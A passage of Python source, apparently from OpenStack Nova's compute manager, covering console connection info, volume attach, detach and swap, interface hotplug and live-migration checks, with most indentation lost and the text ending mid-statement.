def get_console_output(self, context, instance, tail_length):
"""Send the console output for the given instance."""
context = context.elevated()
LOG.info("Get console output", instance=instance)
output = self.driver.get_console_output(context, instance)
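        # Drivers may return either text or bytes; normalize to bytes so
        # _tail_log below can split on b'\n' before decoding for the caller.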
if type(output) is six.text_type:
output = six.b(output)
if tail_length is not None:
output = self._tail_log(output, tail_length)
return output.decode('ascii', 'replace')
def _tail_log(self, log, length):
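        # Return at most the last `length` lines of the raw console log;
        # a non-numeric or zero length yields an empty byte string.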
try:
length = int(length)
except ValueError:
length = 0
if length == 0:
return b''
else:
            return b'\n'.join(log.split(b'\n')[-length:])
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_vnc_console(self, context, console_type, instance):
"""Return connection information for a vnc console."""
context = context.elevated()
LOG.debug("Getting vnc console", instance=instance)
token = uuidutils.generate_uuid()
if not CONF.vnc.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'novnc':
# For essex, novncproxy_base_url must include the full path
# including the html file (like http://myhost/vnc_auto.html)
access_url = '%s?token=%s' % (CONF.vnc.novncproxy_base_url, token)
elif console_type == 'xvpvnc':
access_url = '%s?token=%s' % (CONF.vnc.xvpvncproxy_base_url, token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_vnc_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_spice_console(self, context, console_type, instance):
"""Return connection information for a spice console."""
context = context.elevated()
LOG.debug("Getting spice console", instance=instance)
token = uuidutils.generate_uuid()
if not CONF.spice.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'spice-html5':
# For essex, spicehtml5proxy_base_url must include the full path
# including the html file (like http://myhost/spice_auto.html)
access_url = '%s?token=%s' % (CONF.spice.html5proxy_base_url,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_spice_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_rdp_console(self, context, console_type, instance):
"""Return connection information for a RDP console."""
context = context.elevated()
LOG.debug("Getting RDP console", instance=instance)
token = uuidutils.generate_uuid()
if not CONF.rdp.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'rdp-html5':
access_url = '%s?token=%s' % (CONF.rdp.html5_proxy_base_url,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_rdp_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_mks_console(self, context, console_type, instance):
"""Return connection information for a MKS console."""
context = context.elevated()
LOG.debug("Getting MKS console", instance=instance)
token = uuidutils.generate_uuid()
if not CONF.mks.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'webmks':
access_url = '%s?token=%s' % (CONF.mks.mksproxy_base_url,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_mks_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(
exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
exception.SocketPortRangeExhaustedException,
exception.ImageSerialPortNumberInvalid,
exception.ImageSerialPortNumberExceedFlavorValue,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_serial_console(self, context, console_type, instance):
"""Returns connection information for a serial console."""
LOG.debug("Getting serial console", instance=instance)
if not CONF.serial_console.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
context = context.elevated()
token = uuidutils.generate_uuid()
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_serial_console(context, instance)
if console_type == 'serial':
# add only token
access_url = '%s?token=%s' % (CONF.serial_console.base_url,
token)
elif console_type == 'shellinabox':
# token and internal url for shellinabox
access_url = '%s%s?token=%s' % (
CONF.shellinabox.base_url,
console.internal_access_path,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound)
@wrap_exception()
@wrap_instance_fault
def validate_console_port(self, ctxt, instance, port, console_type):
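        # Ask the virt driver for the current console details of the
        # requested type and check that the proxied port matches it.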
if console_type == "spice-html5":
console_info = self.driver.get_spice_console(ctxt, instance)
elif console_type == "rdp-html5":
console_info = self.driver.get_rdp_console(ctxt, instance)
elif console_type in ("serial", "shellinabox"):
console_info = self.driver.get_serial_console(ctxt, instance)
elif console_type == "webmks":
console_info = self.driver.get_mks_console(ctxt, instance)
else:
console_info = self.driver.get_vnc_console(ctxt, instance)
return console_info.port == port
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def reserve_block_device_name(self, context, instance, device,
volume_id, disk_bus, device_type, tag,
multiattach):
if (tag and not
self.driver.capabilities.get('supports_tagged_attach_volume',
False)):
raise exception.VolumeTaggedAttachNotSupported()
if (multiattach and not
self.driver.capabilities.get('supports_multiattach', False)):
raise exception.MultiattachNotSupportedByVirtDriver(
volume_id=volume_id)
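        # Serialize per instance so concurrent reservations cannot pick the
        # same device name for this instance.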
@utils.synchronized(instance.uuid)
def do_reserve():
bdms = (
objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid))
# NOTE(ndipanov): We need to explicitly set all the fields on the
# object so that obj_load_attr does not fail
new_bdm = objects.BlockDeviceMapping(
context=context,
source_type='volume', destination_type='volume',
instance_uuid=instance.uuid, boot_index=None,
volume_id=volume_id,
device_name=device, guest_format=None,
disk_bus=disk_bus, device_type=device_type, tag=tag)
new_bdm.device_name = self._get_device_name_for_instance(
instance, bdms, new_bdm)
# NOTE(vish): create bdm here to avoid race condition
new_bdm.create()
return new_bdm
return do_reserve()
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def attach_volume(self, context, instance, bdm):
"""Attach a volume to an instance."""
driver_bdm = driver_block_device.convert_volume(bdm)
@utils.synchronized(instance.uuid)
def do_attach_volume(context, instance, driver_bdm):
try:
return self._attach_volume(context, instance, driver_bdm)
except Exception:
with excutils.save_and_reraise_exception():
bdm.destroy()
do_attach_volume(context, instance, driver_bdm)
def _attach_volume(self, context, instance, bdm):
context = context.elevated()
LOG.info('Attaching volume %(volume_id)s to %(mountpoint)s',
{'volume_id': bdm.volume_id,
'mountpoint': bdm['mount_device']},
instance=instance)
compute_utils.notify_about_volume_attach_detach(
context, instance, self.host,
action=fields.NotificationAction.VOLUME_ATTACH,
phase=fields.NotificationPhase.START,
volume_id=bdm.volume_id)
try:
bdm.attach(context, instance, self.volume_api, self.driver,
do_driver_attach=True)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.exception("Failed to attach %(volume_id)s "
"at %(mountpoint)s",
{'volume_id': bdm.volume_id,
'mountpoint': bdm['mount_device']},
instance=instance)
if bdm['attachment_id']:
self.volume_api.attachment_delete(context,
bdm['attachment_id'])
else:
self.volume_api.unreserve_volume(context, bdm.volume_id)
compute_utils.notify_about_volume_attach_detach(
context, instance, self.host,
action=fields.NotificationAction.VOLUME_ATTACH,
phase=fields.NotificationPhase.ERROR,
exception=e,
volume_id=bdm.volume_id)
info = {'volume_id': bdm.volume_id}
self._notify_about_instance_usage(
context, instance, "volume.attach", extra_usage_info=info)
compute_utils.notify_about_volume_attach_detach(
context, instance, self.host,
action=fields.NotificationAction.VOLUME_ATTACH,
phase=fields.NotificationPhase.END,
volume_id=bdm.volume_id)
def _notify_volume_usage_detach(self, context, instance, bdm):
if CONF.volume_usage_poll_interval <= 0:
return
mp = bdm.device_name
# Handle bootable volumes which will not contain /dev/
if '/dev/' in mp:
mp = mp[5:]
try:
vol_stats = self.driver.block_stats(instance, mp)
if vol_stats is None:
return
except NotImplementedError:
return
LOG.debug("Updating volume usage cache with totals", instance=instance)
rd_req, rd_bytes, wr_req, wr_bytes, flush_ops = vol_stats
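        # Persist the final counters for this attachment and fold them into
        # the volume usage totals before the device is detached.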
vol_usage = objects.VolumeUsage(context)
vol_usage.volume_id = bdm.volume_id
vol_usage.instance_uuid = instance.uuid
vol_usage.project_id = instance.project_id
vol_usage.user_id = instance.user_id
vol_usage.availability_zone = instance.availability_zone
vol_usage.curr_reads = rd_req
vol_usage.curr_read_bytes = rd_bytes
vol_usage.curr_writes = wr_req
vol_usage.curr_write_bytes = wr_bytes
vol_usage.save(update_totals=True)
self.notifier.info(context, 'volume.usage',
compute_utils.usage_volume_info(vol_usage))
def _detach_volume(self, context, bdm, instance, destroy_bdm=True,
attachment_id=None):
"""Detach a volume from an instance.
:param context: security context
:param bdm: nova.objects.BlockDeviceMapping volume bdm to detach
:param instance: the Instance object to detach the volume from
:param destroy_bdm: if True, the corresponding BDM entry will be marked
as deleted. Disabling this is useful for operations
like rebuild, when we don't want to destroy BDM
:param attachment_id: The volume attachment_id for the given instance
and volume.
"""
volume_id = bdm.volume_id
compute_utils.notify_about_volume_attach_detach(
context, instance, self.host,
action=fields.NotificationAction.VOLUME_DETACH,
phase=fields.NotificationPhase.START,
volume_id=volume_id)
self._notify_volume_usage_detach(context, instance, bdm)
LOG.info('Detaching volume %(volume_id)s',
{'volume_id': volume_id}, instance=instance)
driver_bdm = driver_block_device.convert_volume(bdm)
driver_bdm.detach(context, instance, self.volume_api, self.driver,
attachment_id=attachment_id, destroy_bdm=destroy_bdm)
info = dict(volume_id=volume_id)
self._notify_about_instance_usage(
context, instance, "volume.detach", extra_usage_info=info)
compute_utils.notify_about_volume_attach_detach(
context, instance, self.host,
action=fields.NotificationAction.VOLUME_DETACH,
phase=fields.NotificationPhase.END,
volume_id=volume_id)
if 'tag' in bdm and bdm.tag:
self._delete_disk_metadata(instance, bdm)
if destroy_bdm:
bdm.destroy()
def _delete_disk_metadata(self, instance, bdm):
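        # Drop the DiskMetadata entry whose serial matches the detached
        # volume so stale device tags are not kept on the instance.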
for device in instance.device_metadata.devices:
if isinstance(device, objects.DiskMetadata):
if 'serial' in device:
if device.serial == bdm.volume_id:
instance.device_metadata.devices.remove(device)
instance.save()
break
else:
# NOTE(artom) We log the entire device object because all
# fields are nullable and may not be set
LOG.warning('Unable to determine whether to clean up '
'device metadata for disk %s', device,
instance=instance)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def detach_volume(self, context, volume_id, instance, attachment_id):
"""Detach a volume from an instance.
:param context: security context
:param volume_id: the volume id
:param instance: the Instance object to detach the volume from
:param attachment_id: The volume attachment_id for the given instance
and volume.
"""
@utils.synchronized(instance.uuid)
def do_detach_volume(context, volume_id, instance, attachment_id):
bdm = objects.BlockDeviceMapping.get_by_volume_and_instance(
context, volume_id, instance.uuid)
self._detach_volume(context, bdm, instance,
attachment_id=attachment_id)
do_detach_volume(context, volume_id, instance, attachment_id)
def _init_volume_connection(self, context, new_volume,
old_volume_id, connector, bdm,
new_attachment_id, mountpoint):
new_volume_id = new_volume['id']
if new_attachment_id is None:
# We're dealing with an old-style attachment so initialize the
# connection so we can get the connection_info.
new_cinfo = self.volume_api.initialize_connection(context,
new_volume_id,
connector)
else:
# Check for multiattach on the new volume and if True, check to
# see if the virt driver supports multiattach.
# TODO(mriedem): This is copied from DriverVolumeBlockDevice
# and should be consolidated into some common code at some point.
vol_multiattach = new_volume.get('multiattach', False)
virt_multiattach = self.driver.capabilities['supports_multiattach']
if vol_multiattach and not virt_multiattach:
raise exception.MultiattachNotSupportedByVirtDriver(
volume_id=new_volume_id)
# This is a new style attachment and the API created the new
# volume attachment and passed the id to the compute over RPC.
# At this point we need to update the new volume attachment with
# the host connector, which will give us back the new attachment
# connection_info.
new_cinfo = self.volume_api.attachment_update(
context, new_attachment_id, connector,
mountpoint)['connection_info']
if vol_multiattach:
# This will be used by the volume driver to determine the
# proper disk configuration.
new_cinfo['multiattach'] = True
old_cinfo = jsonutils.loads(bdm['connection_info'])
if old_cinfo and 'serial' not in old_cinfo:
old_cinfo['serial'] = old_volume_id
# NOTE(lyarwood): serial is not always present in the returned
# connection_info so set it if it is missing as we do in
# DriverVolumeBlockDevice.attach().
if 'serial' not in new_cinfo:
new_cinfo['serial'] = new_volume_id
return (old_cinfo, new_cinfo)
def _swap_volume(self, context, instance, bdm, connector,
old_volume_id, new_volume, resize_to,
new_attachment_id, is_cinder_migration):
new_volume_id = new_volume['id']
mountpoint = bdm['device_name']
failed = False
new_cinfo = None
try:
old_cinfo, new_cinfo = self._init_volume_connection(
context, new_volume, old_volume_id, connector,
bdm, new_attachment_id, mountpoint)
# NOTE(lyarwood): The Libvirt driver, the only virt driver
# currently implementing swap_volume, will modify the contents of
# new_cinfo when connect_volume is called. This is then saved to
# the BDM in swap_volume for future use outside of this flow.
msg = ("swap_volume: Calling driver volume swap with "
"connection infos: new: %(new_cinfo)s; "
"old: %(old_cinfo)s" %
{'new_cinfo': new_cinfo, 'old_cinfo': old_cinfo})
# Both new and old info might contain password
LOG.debug(strutils.mask_password(msg), instance=instance)
self.driver.swap_volume(context, old_cinfo, new_cinfo, instance,
mountpoint, resize_to)
if new_attachment_id:
self.volume_api.attachment_complete(context, new_attachment_id)
msg = ("swap_volume: Driver volume swap returned, new "
"connection_info is now : %(new_cinfo)s" %
{'new_cinfo': new_cinfo})
LOG.debug(strutils.mask_password(msg))
except Exception as ex:
failed = True
with excutils.save_and_reraise_exception():
compute_utils.notify_about_volume_swap(
context, instance, self.host,
fields.NotificationAction.VOLUME_SWAP,
fields.NotificationPhase.ERROR,
old_volume_id, new_volume_id, ex)
if new_cinfo:
msg = ("Failed to swap volume %(old_volume_id)s "
"for %(new_volume_id)s")
LOG.exception(msg, {'old_volume_id': old_volume_id,
'new_volume_id': new_volume_id},
instance=instance)
else:
msg = ("Failed to connect to volume %(volume_id)s "
"with volume at %(mountpoint)s")
LOG.exception(msg, {'volume_id': new_volume_id,
'mountpoint': bdm['device_name']},
instance=instance)
# The API marked the volume as 'detaching' for the old volume
# so we need to roll that back so the volume goes back to
# 'in-use' state.
self.volume_api.roll_detaching(context, old_volume_id)
if new_attachment_id is None:
# The API reserved the new volume so it would be in
# 'attaching' status, so we need to unreserve it so it
# goes back to 'available' status.
self.volume_api.unreserve_volume(context, new_volume_id)
else:
# This is a new style attachment for the new volume, which
# was created in the API. We just need to delete it here
# to put the new volume back into 'available' status.
self.volume_api.attachment_delete(
context, new_attachment_id)
finally:
# TODO(mriedem): This finally block is terribly confusing and is
# trying to do too much. We should consider removing the finally
# block and move whatever needs to happen on success and failure
# into the blocks above for clarity, even if it means a bit of
# redundant code.
conn_volume = new_volume_id if failed else old_volume_id
if new_cinfo:
LOG.debug("swap_volume: removing Cinder connection "
"for volume %(volume)s", {'volume': conn_volume},
instance=instance)
if bdm.attachment_id is None:
# This is the pre-3.44 flow for new-style volume
# attachments so just terminate the connection.
self.volume_api.terminate_connection(context,
conn_volume,
connector)
else:
# This is a new style volume attachment. If we failed, then
# the new attachment was already deleted above in the
# exception block and we have nothing more to do here. If
# swap_volume was successful in the driver, then we need to
# "detach" the original attachment by deleting it.
if not failed:
self.volume_api.attachment_delete(
context, bdm.attachment_id)
# Need to make some decisions based on whether this was
# a Cinder initiated migration or not. The callback to
# migration completion isn't needed in the case of a
# nova initiated simple swap of two volume
# "volume-update" call so skip that. The new attachment
# scenarios will give us a new attachment record and
# that's what we want.
if bdm.attachment_id and not is_cinder_migration:
# we don't callback to cinder
comp_ret = {'save_volume_id': new_volume_id}
else:
# NOTE(lyarwood): The following call to
# os-migrate-volume-completion returns a dict containing
# save_volume_id, this volume id has two possible values :
# 1. old_volume_id if we are migrating (retyping) volumes
# 2. new_volume_id if we are swapping between two existing
# volumes
# This volume id is later used to update the volume_id and
# connection_info['serial'] of the BDM.
comp_ret = self.volume_api.migrate_volume_completion(
context,
old_volume_id,
new_volume_id,
error=failed)
LOG.debug("swap_volume: Cinder migrate_volume_completion "
"returned: %(comp_ret)s", {'comp_ret': comp_ret},
instance=instance)
return (comp_ret, new_cinfo)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def swap_volume(self, context, old_volume_id, new_volume_id, instance,
new_attachment_id):
"""Swap volume for an instance."""
context = context.elevated()
compute_utils.notify_about_volume_swap(
context, instance, self.host,
fields.NotificationAction.VOLUME_SWAP,
fields.NotificationPhase.START,
old_volume_id, new_volume_id)
bdm = objects.BlockDeviceMapping.get_by_volume_and_instance(
context, old_volume_id, instance.uuid)
connector = self.driver.get_volume_connector(instance)
resize_to = 0
old_volume = self.volume_api.get(context, old_volume_id)
# Yes this is a tightly-coupled state check of what's going on inside
# cinder, but we need this while we still support old (v1/v2) and
# new style attachments (v3.44). Once we drop support for old style
# attachments we could think about cleaning up the cinder-initiated
# swap volume API flows.
is_cinder_migration = (
True if old_volume['status'] in ('retyping',
'migrating') else False)
old_vol_size = old_volume['size']
new_volume = self.volume_api.get(context, new_volume_id)
new_vol_size = new_volume['size']
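        # If the new volume is larger, have the driver grow the guest disk
        # to the new size as part of the swap.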
if new_vol_size > old_vol_size:
resize_to = new_vol_size
LOG.info('Swapping volume %(old_volume)s for %(new_volume)s',
{'old_volume': old_volume_id, 'new_volume': new_volume_id},
instance=instance)
comp_ret, new_cinfo = self._swap_volume(context,
instance,
bdm,
connector,
old_volume_id,
new_volume,
resize_to,
new_attachment_id,
is_cinder_migration)
# NOTE(lyarwood): Update the BDM with the modified new_cinfo and
# correct volume_id returned by Cinder.
save_volume_id = comp_ret['save_volume_id']
new_cinfo['serial'] = save_volume_id
values = {
'connection_info': jsonutils.dumps(new_cinfo),
'source_type': 'volume',
'destination_type': 'volume',
'snapshot_id': None,
'volume_id': save_volume_id,
'no_device': None}
if resize_to:
values['volume_size'] = resize_to
if new_attachment_id is not None:
# This was a volume swap for a new-style attachment so we
# need to update the BDM attachment_id for the new attachment.
values['attachment_id'] = new_attachment_id
LOG.debug("swap_volume: Updating volume %(volume_id)s BDM record with "
"%(updates)s", {'volume_id': bdm.volume_id,
'updates': values},
instance=instance)
bdm.update(values)
bdm.save()
compute_utils.notify_about_volume_swap(
context, instance, self.host,
fields.NotificationAction.VOLUME_SWAP,
fields.NotificationPhase.END,
old_volume_id, new_volume_id)
@wrap_exception()
def remove_volume_connection(self, context, volume_id, instance):
"""Remove the volume connection on this host
Detach the volume from this instance on this host, and if this is
the cinder v2 flow, call cinder to terminate the connection.
"""
try:
bdm = objects.BlockDeviceMapping.get_by_volume_and_instance(
context, volume_id, instance.uuid)
driver_bdm = driver_block_device.convert_volume(bdm)
driver_bdm.driver_detach(context, instance,
self.volume_api, self.driver)
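            # For the pre-3.44 (cinder v2) flow the export also has to be
            # terminated explicitly on the cinder side (the check below).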
if bdm.attachment_id is None:
# cinder v2 api flow
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context, volume_id,
connector)
except exception.NotFound:
pass
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def attach_interface(self, context, instance, network_id, port_id,
                         requested_ip, tag):
        """Use hotplug to add a network adapter to an instance."""
if not self.driver.capabilities['supports_attach_interface']:
raise exception.AttachInterfaceNotSupported(
instance_uuid=instance.uuid)
if (tag and not
self.driver.capabilities.get('supports_tagged_attach_interface',
False)):
raise exception.NetworkInterfaceTaggedAttachNotSupported()
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.INTERFACE_ATTACH,
phase=fields.NotificationPhase.START)
bind_host_id = self.driver.network_binding_host_id(context, instance)
network_info = self.network_api.allocate_port_for_instance(
context, instance, port_id, network_id, requested_ip,
bind_host_id=bind_host_id, tag=tag)
if len(network_info) != 1:
LOG.error('allocate_port_for_instance returned %(ports)s '
'ports', {'ports': len(network_info)})
# TODO(elod.illes): an instance.interface_attach.error notification
# should be sent here
raise exception.InterfaceAttachFailed(
instance_uuid=instance.uuid)
image_meta = objects.ImageMeta.from_instance(instance)
try:
self.driver.attach_interface(context, instance, image_meta,
network_info[0])
except exception.NovaException as ex:
port_id = network_info[0].get('id')
            LOG.warning("Attach interface failed, trying to deallocate "
                        "port %(port_id)s, reason: %(msg)s",
{'port_id': port_id, 'msg': ex},
instance=instance)
try:
self.network_api.deallocate_port_for_instance(
context, instance, port_id)
except Exception:
LOG.warning("deallocate port %(port_id)s failed",
{'port_id': port_id}, instance=instance)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.INTERFACE_ATTACH,
phase=fields.NotificationPhase.ERROR,
exception=ex)
raise exception.InterfaceAttachFailed(
instance_uuid=instance.uuid)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.INTERFACE_ATTACH,
phase=fields.NotificationPhase.END)
return network_info[0]
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def detach_interface(self, context, instance, port_id):
"""Detach a network adapter from an instance."""
network_info = instance.info_cache.network_info
condemned = None
for vif in network_info:
if vif['id'] == port_id:
condemned = vif
break
if condemned is None:
raise exception.PortNotFound(_("Port %s is not "
"attached") % port_id)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.INTERFACE_DETACH,
phase=fields.NotificationPhase.START)
try:
self.driver.detach_interface(context, instance, condemned)
except exception.NovaException as ex:
# If the instance was deleted before the interface was detached,
# just log it at debug.
log_level = (logging.DEBUG
if isinstance(ex, exception.InstanceNotFound)
else logging.WARNING)
LOG.log(log_level,
"Detach interface failed, port_id=%(port_id)s, reason: "
"%(msg)s", {'port_id': port_id, 'msg': ex},
instance=instance)
raise exception.InterfaceDetachFailed(instance_uuid=instance.uuid)
else:
try:
self.network_api.deallocate_port_for_instance(
context, instance, port_id)
except Exception as ex:
with excutils.save_and_reraise_exception():
# Since this is a cast operation, log the failure for
# triage.
LOG.warning('Failed to deallocate port %(port_id)s '
'for instance. Error: %(error)s',
{'port_id': port_id, 'error': ex},
instance=instance)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.INTERFACE_DETACH,
phase=fields.NotificationPhase.END)
def _get_compute_info(self, context, host):
return objects.ComputeNode.get_first_node_by_host_for_old_compat(
context, host)
@wrap_exception()
def check_instance_shared_storage(self, ctxt, instance, data):
"""Check if the instance files are shared
:param ctxt: security context
:param instance: dict of instance data
:param data: result of driver.check_instance_shared_storage_local
        Returns True if the instance disks are located on shared storage and
        False otherwise.
"""
return self.driver.check_instance_shared_storage_remote(ctxt, data)
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def check_can_live_migrate_destination(self, ctxt, instance,
block_migration, disk_over_commit):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param context: security context
:param instance: dict of instance data
:param block_migration: if true, prepare for block migration
if None, calculate it in driver
:param disk_over_commit: if true, allow disk over commit
if None, ignore disk usage checking
:returns: a dict containing migration info
"""
return self._do_check_can_live_migrate_destination(ctxt, instance,
block_migration,
disk_over_commit)
def _do_check_can_live_migrate_destination(self, ctxt, instance,
block_migration,
disk_over_commit):
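        # Gather the ComputeNode records for both hosts as primitives so the
        # driver can compare source and destination capabilities.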
src_compute_info = obj_base.obj_to_primitive(
self._get_compute_info(ctxt, instance.host))
dst_compute_info = obj_base.obj_to_primitive(
self._get_compute_info(ctxt, CONF.host))
dest_check_data = self.driver.check_can_live_migrate_destination(ctxt,
instance, src_compute_info, dst_compute_info,
block_migration, disk_over_commit)
LOG.debug('destination check data is %s', dest_check_data)
try:
migrate_data = self.compute_rpcapi.\
check_can_live_migrate_source(ctxt, instance,
dest_check_data)
finally:
self.driver.cleanup_live_migration_destination_check(ctxt,
dest_check_data)
return migrate_data
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def check_can_live_migrate_source(self, ctxt, instance, dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param ctxt: security context
:param instance: dict of instance data
:param dest_check_data: result of check_can_live_migrate_destination
:returns: a dict containing migration info
"""
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, instance.uuid)
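        # Determine whether the instance is volume backed and pass that to
        # the driver, along with the block device info, for the source-side
        # checks.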
is_volume_backed = compute_utils.is_volume_backed_instance(
ctxt, instance, bdms)
dest_check_data.is_volume_backed = is_volume_backed
block_device_info = self._get_instance_block_device_info(
ctxt, instance, refresh_conn_info=False, bdms=bdms)
result = self.driver.check_can_live_migrate_source(ctxt, instance,
dest_check_data,
block_device_info)
LOG.debug('source check data is %s', result)
return result
@wrap_exception()
@wrap_instance_event(prefix='compute')
@wrap_instance_fault
def pre_live_migration(self, context, instance, block_migration, disk,
migrate_data):
"""Preparations for live migration at dest host.
:param context: security context
:param instance: dict of instance data
:param block_migration: if true, prepare for block migration
:param disk: disk info of instance
:param migrate_data: A dict or LiveMigrateData object holding data
required for live migration without shared
storage.
:returns: migrate_data containing additional migration info
"""
LOG.debug('pre_live_migration data is %s', migrate_data)
migrate_data.old_vol_attachment_ids = {}
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
network_info = self.network_api.get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.pre.start",
network_info=network_info)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.LIVE_MIGRATION_PRE,
phase=fields.NotificationPhase.START, bdms=bdms)
connector = self.driver.get_volume_connector(instance)
try:
for bdm in bdms:
if bdm.is_volume and bdm.attachment_id is not None:
# This bdm uses the new cinder v3.44 API.
# We will create a new attachment for this
# volume on this migration destination host. The old
# attachment will be deleted on the source host
# when the migration succeeds. The old attachment_id
# is stored in dict with the key being the bdm.volume_id
# so it can be restored on rollback.
#
# Also note that attachment_update is not needed as we
# are providing the connector in the create call.
attach_ref = self.volume_api.attachment_create(
context, bdm.volume_id, bdm.instance_uuid,
connector=connector, mountpoint=bdm.device_name)
# save current attachment so we can detach it on success,
# or restore it on a rollback.
migrate_data.old_vol_attachment_ids[bdm.volume_id] = \
bdm.attachment_id
# update the bdm with the new attachment_id.
bdm.attachment_id = attach_ref['id']
bdm.save()
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True,
bdms=bdms)
migrate_data = self.driver.pre_live_migration(context,
instance,
block_device_info,
network_info,
disk,
migrate_data)
LOG.debug('driver pre_live_migration data is %s', migrate_data)
# NOTE(tr3buchet): setup networks on destination host
self.network_api.setup_networks_on_host(context, instance,
self.host)
            # Create filters for the hypervisor and firewall. An example is
            # nova-instance-instance-xxx, which is written to libvirt.xml
            # (check "virsh nwfilter-list"). This nwfilter is necessary on
            # the destination host, so this call also creates the filtering
            # rules on the destination host.
self.driver.ensure_filtering_rules_for_instance(instance,
network_info)
except Exception:
# If we raise, migrate_data with the updated attachment ids
# will not be returned to the source host for rollback.
# So we need to rollback new attachments here.
with excutils.save_and_reraise_exception():
old_attachments = migrate_data.old_vol_attachment_ids
for bdm in bdms:
if (bdm.is_volume and bdm.attachment_id is not None and
bdm.volume_id in old_attachments):
self.volume_api.attachment_delete(context,
bdm.attachment_id)
bdm.attachment_id = old_attachments[bdm.volume_id]
bdm.save()
# Volume connections are complete, tell cinder that all the
# attachments have completed.
for bdm in bdms:
if bdm.is_volume and bdm.attachment_id is not None:
self.volume_api.attachment_complete(context,
bdm.attachment_id)
self._notify_about_instance_usage(
context, instance, "live_migration.pre.end",
network_info=network_info)
compute_utils.notify_about_instance_action(
context, instance, self.host,
action=fields.NotificationAction.LIVE_MIGRATION_PRE,
phase=fields.NotificationPhase.END, bdms=bdms)
LOG.debug('pre_live_migration result data is %s', migrate_data)
return migrate_data
@staticmethod
def _neutron_failed_live_migration_callback(event_name, instance):
msg = ('Neutron reported failure during live migration '
'with %(event)s for instance %(uuid)s')
msg_args = {'event': event_name, 'uuid': instance.uuid}
if CONF.vif_plugging_is_fatal:
raise exception.VirtualInterfacePlugException(msg % msg_args)
LOG.error(msg, msg_args)
@staticmethod
def _get_neutron_events_for_live_migration(instance):
# We don't generate events if CONF.vif_plugging_timeout=0
# or if waiting during live migration is disabled,
# meaning that the operator disabled using them.
if (CONF.vif_plugging_timeout and utils.is_neutron() and
